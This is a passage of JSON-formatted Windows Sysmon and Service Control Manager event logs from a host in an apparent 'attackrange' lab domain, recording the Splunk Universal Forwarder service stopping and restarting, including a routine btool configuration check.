Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.230\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.230","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76839,"ProcessID":856,"ThreadID":1128,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76840,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.247\r\nProcessGuid: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nProcessId: 5064\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.247","ProcessGuid":"{A837DB8D-0238-5F25-0000-00109F0C0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109F0C0500}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109F0C0500}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
